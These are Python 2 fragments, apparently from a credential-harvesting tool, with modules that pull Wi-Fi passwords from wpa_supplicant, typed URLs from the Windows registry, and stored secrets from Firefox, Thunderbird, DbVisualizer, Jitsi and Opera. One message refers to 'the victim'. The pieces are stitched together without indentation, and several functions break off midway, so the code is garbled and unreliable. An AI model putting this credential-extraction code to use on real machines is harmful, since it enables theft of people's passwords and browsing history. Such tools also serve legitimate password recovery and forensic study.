offsetVals.append(key + pagesize * page)
offsetVals.append(val + pagesize * page)
readkeys += 1
i += 4
offsetVals.append(pagesize * (page + 1))
valKey = sorted(offsetVals)
for i in range(keys * 2):
f.seek(valKey[i])
data = f.read(valKey[i + 1] - valKey[i])
db1.append(data)
page += 1
f.close()
db = {}
for i in range(0, len(db1), 2):
db[db1[i + 1]] = db1[i]
return db
def run(self):
Header().title_info('Wifi (from WPA Supplicant)')
if self.check_file_access():
return
# check root access
if os.getuid() != 0:
print_debug('INFO',
'You need more privileges (run it with sudo)\n')
return
pwdFound = self.parse_file()
print_output("wpa_supplicant", pwdFound)
def history_from_regedit(self):
urls = []
# open the registry
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0,
accessRead)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
return []
def get_path(self, software_name):
if 'APPDATA' in os.environ:
if software_name == 'Firefox':
path = '%s\Mozilla\Firefox' % str(os.environ['APPDATA'])
elif software_name == 'Thunderbird':
path = '%s\Thunderbird' % str(os.environ['APPDATA'])
else:
print_debug(
'The APPDATA environment variable is not definded.\nUse the -s option and specify the folder path of the victim\nPath: <HOMEPATH>\Application Data\Mozilla\Firefox\Profiles\<PROFILE_NAME>'
)
return
return path
def get_hash_table(self, list):
# get the url list
urls = self.get_history()
urls = urls + list
# calculate the hash for all urls found on the history
hash_tables = []
for u in range(len(urls)):
try:
h = (urls[u] + '\0').encode('UTF-16LE')
hash_tables.append([h, hashlib.sha1(h).hexdigest().lower()])
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
def get_dic_file(self, dictionary_path):
words = []
if dictionary_path:
try:
dicFile = open (dictionary_path,'r')
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', 'Unable to open passwords file: %s' % str(dictionary_path))
return []
for word in dicFile.readlines():
words.append(word.strip('\n'))
dicFile.close()
def run(self):
# print the title
Header().title_debug('DbVisualizer')
mainPath = self.get_mainPath()
if mainPath == 'DBVIS_NOT_EXISTS':
print_debug('INFO', 'DbVisualizer not installed.')
else:
passphrase = self.get_passphrase()
salt = self.get_salt()
self.get_infos(mainPath, passphrase, salt)
def run(self):
# print title
Header().title_info('Jitsi')
file_properties = self.get_path()
if file_properties == 'Error':
print_debug('ERROR',
'The APPDATA environment variable is not defined')
elif file_properties == 'JITSI_NOT_EXISTS':
print_debug('INFO', 'Jitsi not installed.')
else:
self.get_info(file_properties)
def masterPasswordUsed(self, path):
# the init file is not well defined so lines have to be removed before to parse it
cp = RawConfigParser()
f = open(path + os.sep + 'operaprefs.ini', 'rb')
f.readline() # discard first line
while 1:
try:
cp.readfp(f)
break
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
f.readline() # discard first line